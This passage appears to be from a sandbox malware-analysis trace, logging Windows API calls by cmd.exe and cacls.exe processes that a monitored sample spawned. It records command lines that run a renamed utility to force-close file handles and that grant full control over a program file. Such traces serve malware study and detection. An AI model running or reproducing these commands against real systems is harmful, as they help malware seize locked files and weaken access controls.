(nStdHandle=0xfffffff5) returned 0x7 [0248.151] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df34c | out: lpMode=0x3df34c) returned 1 [0248.151] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.151] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x3df378, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df378*=0x7) returned 1 [0248.153] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x3df388 | out: _Buffer="(`tdq963ii.exe -accepteula \"MSPVWCTL.DLL.mui\" -nobanner`) DO ") returned 61 [0248.153] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.153] GetFileType (hFile=0x7) returned 0x2 [0248.153] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.153] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df348 | out: lpMode=0x3df348) returned 1 [0248.154] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.154] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3d, lpNumberOfCharsWritten=0x3df374, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df374*=0x3d) returned 1 [0248.154] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.154] GetFileType (hFile=0x7) returned 0x2 [0248.154] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.154] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df354 | out: lpMode=0x3df354) returned 1 [0248.154] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.155] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x3df380, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x3df380*=0x1) returned 1 [0248.155] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.155] GetFileType (hFile=0x7) returned 0x2 [0248.155] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.155] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df338 | out: lpMode=0x3df338) returned 1 [0248.155] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.156] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x74f4e8*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x3df364, lpReserved=0x0 | out: lpBuffer=0x74f4e8*, lpNumberOfCharsWritten=0x3df364*=0xc) returned 1 [0248.156] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3df370 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0248.156] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.156] GetFileType (hFile=0x7) returned 0x2 [0248.156] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.156] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df330 | out: lpMode=0x3df330) returned 1 [0248.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.157] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3df35c, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df35c*=0x26) returned 1 [0248.158] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3df38c | out: _Buffer=") ") returned 2 [0248.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.158] GetFileType (hFile=0x7) returned 0x2 [0248.158] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.159] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df34c | out: lpMode=0x3df34c) returned 1 [0248.159] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.159] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df378, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df378*=0x2) returned 1 [0248.159] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3df3ac | out: _Buffer="\r\n") returned 2 [0248.159] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.159] GetFileType (hFile=0x7) returned 0x2 [0248.160] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.160] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df36c | out: lpMode=0x3df36c) returned 1 [0248.160] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.160] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df398, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df398*=0x2) returned 1 [0248.162] GetProcessHeap () returned 0x740000 [0248.162] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x2c) returned 0x7555e8 [0248.162] GetProcessHeap () returned 0x740000 [0248.162] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xc) returned 0x740db8 [0248.162] GetProcessHeap () returned 0x740000 [0248.162] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xc) returned 0x740dd0 [0248.162] GetProcessHeap () returned 0x740000 [0248.162] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xe) returned 0x740de8 [0248.162] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0248.162] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0248.162] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0248.162] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0248.162] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0248.162] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0248.163] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0248.163] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x3df2c8, _Radix=0 | out: _EndPtr=0x3df2c8*=",6 delims=: \"") returned 3 [0248.163] wcstol (in: _String="6 delims=: \"", _EndPtr=0x3df2c8, _Radix=0 | out: _EndPtr=0x3df2c8*=" delims=: \"") returned 6 [0248.163] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0248.163] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0248.163] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0248.163] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0248.163] GetProcessHeap () returned 0x740000 [0248.163] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x740de8 | out: hHeap=0x740000) returned 1 [0248.163] GetProcessHeap () returned 0x740000 [0248.163] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xe) returned 0x740de8 [0248.163] GetProcessHeap () returned 0x740000 [0248.163] RtlReAllocateHeap (Heap=0x740000, Flags=0x0, Ptr=0x740db8, Size=0xe) returned 0x740e00 [0248.163] GetProcessHeap () returned 0x740000 [0248.163] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x740e00) returned 0xe [0248.163] GetProcessHeap () returned 0x740000 [0248.163] RtlReAllocateHeap (Heap=0x740000, Flags=0x0, Ptr=0x740dd0, Size=0x14) returned 0x7563c8 [0248.163] GetProcessHeap () returned 0x740000 [0248.163] RtlSizeHeap (HeapHandle=0x740000, Flags=0x0, MemoryPointer=0x7563c8) returned 0x14 [0248.163] _wpopen (_Command="tdq963ii.exe -accepteula \"MSPVWCTL.DLL.mui\" -nobanner", _Mode="rb") returned 0x77032960 [0248.181] feof (_File=0x77032960) returned 0 [0248.181] ferror (_File=0x77032960) returned 0 [0248.182] GetProcessHeap () returned 0x740000 [0248.182] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x108) returned 0x7563e8 [0248.182] fgets (_Buf=0x7563f0, _MaxCount=256, _File=0x77032960) Process: id = "261" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x27be1000" os_pid = "0xb30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "246" os_parent_pid = "0xad0" cmd_line = "cacls \"C:\\Program Files (x86)\\Adobe\\accupos.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 873 os_tid = 0xb14 Process: id = "262" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x169fe000" os_pid = "0x5d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "223" os_parent_pid = "0x540" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Shorthand.jtp\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 874 os_tid = 0x130 [0241.568] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3afa9c | out: lpSystemTimeAsFileTime=0x3afa9c*(dwLowDateTime=0x45c33080, dwHighDateTime=0x1d68287)) [0241.568] GetCurrentProcessId () returned 0x5d8 [0241.568] GetCurrentThreadId () returned 0x130 [0241.568] GetTickCount () returned 0x11672ff [0241.568] QueryPerformanceCounter (in: lpPerformanceCount=0x3afa94 | out: lpPerformanceCount=0x3afa94*=36190710016) returned 1 [0241.570] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0241.570] __set_app_type (_Type=0x1) [0241.570] __p__fmode () returned 0x770331f4 [0241.570] __p__commode () returned 0x770331fc [0241.570] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0241.570] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0241.570] GetCurrentThreadId () returned 0x130 [0241.570] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x130) returned 0x60 [0241.570] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0241.570] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0241.570] SetThreadUILanguage (LangId=0x0) returned 0x409 [0241.571] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0241.571] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3afa2c | out: phkResult=0x3afa2c*=0x0) returned 0x2 [0241.571] VirtualQuery (in: lpAddress=0x3afa63, lpBuffer=0x3af9fc, dwLength=0x1c | out: lpBuffer=0x3af9fc*(BaseAddress=0x3af000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0241.571] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x3af9fc, dwLength=0x1c | out: lpBuffer=0x3af9fc*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0241.571] VirtualQuery (in: lpAddress=0x2b1000, lpBuffer=0x3af9fc, dwLength=0x1c | out: lpBuffer=0x3af9fc*(BaseAddress=0x2b1000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0241.571] VirtualQuery (in: lpAddress=0x2b3000, lpBuffer=0x3af9fc, dwLength=0x1c | out: lpBuffer=0x3af9fc*(BaseAddress=0x2b3000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0241.571] VirtualQuery (in: lpAddress=0x3b0000, lpBuffer=0x3af9fc, dwLength=0x1c | out: lpBuffer=0x3af9fc*(BaseAddress=0x3b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0241.571] GetConsoleOutputCP () returned 0x1b5 [0241.572] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0241.572] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0241.572] _get_osfhandle (_FileHandle=1) returned 0x80 [0241.572] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0241.572] _get_osfhandle (_FileHandle=1) returned 0x80 [0241.572] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0241.572] _get_osfhandle (_FileHandle=0) returned 0x3 [0241.572] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0241.573] GetEnvironmentStringsW () returned 0x4721e0* [0241.573] GetProcessHeap () returned 0x460000 [0241.573] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb82) returned 0x472d70 [0241.573] FreeEnvironmentStringsW (penv=0x4721e0) returned 1 [0241.573] GetProcessHeap () returned 0x460000 [0241.573] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4) returned 0x472060 [0241.573] GetEnvironmentStringsW () returned 0x4721e0* [0241.573] GetProcessHeap () returned 0x460000 [0241.573] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb82) returned 0x473900 [0241.574] FreeEnvironmentStringsW (penv=0x4721e0) returned 1 [0241.574] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3ae99c | out: phkResult=0x3ae99c*=0x68) returned 0x0 [0241.574] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3ae9a4, lpData=0x3ae9a8, lpcbData=0x3ae9a0*=0x1000 | out: lpType=0x3ae9a4*=0x0, lpData=0x3ae9a8*=0x0, lpcbData=0x3ae9a0*=0x1000) returned 0x2 [0241.574] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3ae9a4, lpData=0x3ae9a8, lpcbData=0x3ae9a0*=0x1000 | out: lpType=0x3ae9a4*=0x4, lpData=0x3ae9a8*=0x1, lpcbData=0x3ae9a0*=0x4) returned 0x0 [0241.574] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3ae9a4, lpData=0x3ae9a8, lpcbData=0x3ae9a0*=0x1000 | out: lpType=0x3ae9a4*=0x0, lpData=0x3ae9a8*=0x1, lpcbData=0x3ae9a0*=0x1000) returned 0x2 [0241.574] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3ae9a4, lpData=0x3ae9a8, lpcbData=0x3ae9a0*=0x1000 | out: lpType=0x3ae9a4*=0x4, lpData=0x3ae9a8*=0x0, lpcbData=0x3ae9a0*=0x4) returned 0x0 [0241.574] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3ae9a4, lpData=0x3ae9a8, lpcbData=0x3ae9a0*=0x1000 | out: lpType=0x3ae9a4*=0x4, lpData=0x3ae9a8*=0x40, lpcbData=0x3ae9a0*=0x4) returned 0x0 [0241.574] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3ae9a4, lpData=0x3ae9a8, lpcbData=0x3ae9a0*=0x1000 | out: lpType=0x3ae9a4*=0x4, lpData=0x3ae9a8*=0x40, lpcbData=0x3ae9a0*=0x4) returned 0x0 [0241.574] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3ae9a4, lpData=0x3ae9a8, lpcbData=0x3ae9a0*=0x1000 | out: lpType=0x3ae9a4*=0x0, lpData=0x3ae9a8*=0x40, lpcbData=0x3ae9a0*=0x1000) returned 0x2 [0241.574] RegCloseKey (hKey=0x68) returned 0x0 [0241.574] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3ae99c | out: phkResult=0x3ae99c*=0x68) returned 0x0 [0241.575] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3ae9a4, lpData=0x3ae9a8, lpcbData=0x3ae9a0*=0x1000 | out: lpType=0x3ae9a4*=0x0, lpData=0x3ae9a8*=0x40, lpcbData=0x3ae9a0*=0x1000) returned 0x2 [0241.575] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3ae9a4, lpData=0x3ae9a8, lpcbData=0x3ae9a0*=0x1000 | out: lpType=0x3ae9a4*=0x4, lpData=0x3ae9a8*=0x1, lpcbData=0x3ae9a0*=0x4) returned 0x0 [0241.575] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3ae9a4, lpData=0x3ae9a8, lpcbData=0x3ae9a0*=0x1000 | out: lpType=0x3ae9a4*=0x0, lpData=0x3ae9a8*=0x1, lpcbData=0x3ae9a0*=0x1000) returned 0x2 [0241.575] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3ae9a4, lpData=0x3ae9a8, lpcbData=0x3ae9a0*=0x1000 | out: lpType=0x3ae9a4*=0x4, lpData=0x3ae9a8*=0x0, lpcbData=0x3ae9a0*=0x4) returned 0x0 [0241.575] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3ae9a4, lpData=0x3ae9a8, lpcbData=0x3ae9a0*=0x1000 | out: lpType=0x3ae9a4*=0x4, lpData=0x3ae9a8*=0x9, lpcbData=0x3ae9a0*=0x4) returned 0x0 [0241.575] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3ae9a4, lpData=0x3ae9a8, lpcbData=0x3ae9a0*=0x1000 | out: lpType=0x3ae9a4*=0x4, lpData=0x3ae9a8*=0x9, lpcbData=0x3ae9a0*=0x4) returned 0x0 [0241.575] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3ae9a4, lpData=0x3ae9a8, lpcbData=0x3ae9a0*=0x1000 | out: lpType=0x3ae9a4*=0x0, lpData=0x3ae9a8*=0x9, lpcbData=0x3ae9a0*=0x1000) returned 0x2 [0241.575] RegCloseKey (hKey=0x68) returned 0x0 [0241.575] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e307 [0241.575] srand (_Seed=0x5f51e307) [0241.575] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Shorthand.jtp\" -nobanner" [0241.575] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Shorthand.jtp\" -nobanner" [0241.576] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0241.576] GetProcessHeap () returned 0x460000 [0241.577] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x210) returned 0x474490 [0241.577] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x474498, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0241.577] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0241.577] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0241.577] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0241.577] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0241.577] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0241.577] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0241.577] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0241.577] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0241.577] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0241.577] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0241.577] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0241.578] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0241.578] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0241.578] GetProcessHeap () returned 0x460000 [0241.578] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x54) returned 0x4746a8 [0241.578] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3af768 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0241.578] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3af768, lpFilePart=0x3af764 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3af764*="Desktop") returned 0x25 [0241.578] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0241.578] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3af4e4 | out: lpFindFileData=0x3af4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4595f660, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x4595f660, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x472070 [0241.578] FindClose (in: hFindFile=0x472070 | out: hFindFile=0x472070) returned 1 [0241.578] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3af4e4 | out: lpFindFileData=0x3af4e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x45665ae0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x45665ae0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x472070 [0241.578] FindClose (in: hFindFile=0x472070 | out: hFindFile=0x472070) returned 1 [0241.578] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0241.579] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3af4e4 | out: lpFindFileData=0x3af4e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x472070 [0241.579] FindClose (in: hFindFile=0x472070 | out: hFindFile=0x472070) returned 1 [0241.579] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0241.579] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0241.579] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0241.579] GetProcessHeap () returned 0x460000 [0241.579] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x472d70 | out: hHeap=0x460000) returned 1 [0241.579] GetEnvironmentStringsW () returned 0x4721e0* [0241.579] GetProcessHeap () returned 0x460000 [0241.579] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb82) returned 0x472d70 [0241.579] FreeEnvironmentStringsW (penv=0x4721e0) returned 1 [0241.579] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0241.579] GetProcessHeap () returned 0x460000 [0241.579] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4746a8 | out: hHeap=0x460000) returned 1 [0241.580] GetProcessHeap () returned 0x460000 [0241.580] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400e) returned 0x474f08 [0241.580] GetProcessHeap () returned 0x460000 [0241.580] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x72) returned 0x478f38 [0241.580] GetProcessHeap () returned 0x460000 [0241.580] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474f08 | out: hHeap=0x460000) returned 1 [0241.580] GetConsoleOutputCP () returned 0x1b5 [0241.581] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0241.581] GetUserDefaultLCID () returned 0x409 [0241.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0241.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3af8a8, cchData=128 | out: lpLCData="0") returned 2 [0241.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3af8a8, cchData=128 | out: lpLCData="0") returned 2 [0241.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3af8a8, cchData=128 | out: lpLCData="1") returned 2 [0241.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0241.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0241.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0241.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 